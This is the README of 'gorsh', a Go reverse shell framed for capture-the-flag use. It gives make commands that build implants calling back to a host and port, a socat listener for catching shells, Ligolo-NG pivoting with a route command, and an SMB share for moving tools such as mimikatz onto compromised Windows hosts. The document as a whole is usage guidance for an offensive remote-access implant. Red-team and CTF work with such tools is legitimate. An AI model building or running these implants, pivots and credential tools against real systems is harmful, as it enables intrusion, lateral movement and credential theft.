# gorsh

[go]lang [r]everse [sh]ell

## Usage

Generate agents with:

```
# For the `make` targets, you only need the `LHOST` and `LPORT` environment variables.
$ make {windows,macos,linux} LHOST=example.com LPORT=443
```

Generate the server with:

```
# The server target only needs `LPORT`.
$ make server LPORT=443
```

Generate everything (all agents and the server) with `make all LHOST=example.com LPORT=443`.

## Catching the shell

```
make listen LPORT=443
```

Tmux is a powerful terminal multiplexer with robust session/window/pane management. It works better at managing multiple reverse shells than most shell managers I've seen. The server binary creates a tmux session per host and a window for each reverse shell binary invocation. If you run the `spawn` command in a shell, a new window opens in that host's session, creating a "tab".

To catch a shell without gorsh-server and/or tmux, use the following socat listener (note that `verify=0` disables client-certificate verification, so any client that can reach the port may connect):

```
socat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE
```

## Features

Feature comparison, Windows vs. not Windows (the original comparison image is not reproduced here).

### Execute Assembly

Assemblies are gzipped and embedded within the implant. Since this is a CTF shell, I'm optimizing for ease of use and not tradecraft.

### Ligolo-NG Tunnels

Agents have the ligolo client embedded. Run `make start-ligolo` to prepare the interfaces and start ligolo-ng. From an agent, run `pivot` and a callback should land on the ligolo interface. Select the callback in ligolo and start routing. On your box, create a route to the remote network through the tun interface; all traffic to that destination will then egress through ligolo, for example:

```
ip route add 172.16.43.0/24 dev ligolo
```

### File upload/download

Since this is a reverse shell that only shares its stdin/stdout/stderr over a network socket, the traditional methods of uploading and downloading files aren't available. A dockerized SMB server bridges that gap. Configure the directories to be shared in the Makefile, then run `make start-smb`. If you want to see the logs so you can monitor callbacks, use `make smblogs`. Windows implants understand UNC paths, so something like `cp //myip/tools/mimikatz.exe .` is possible.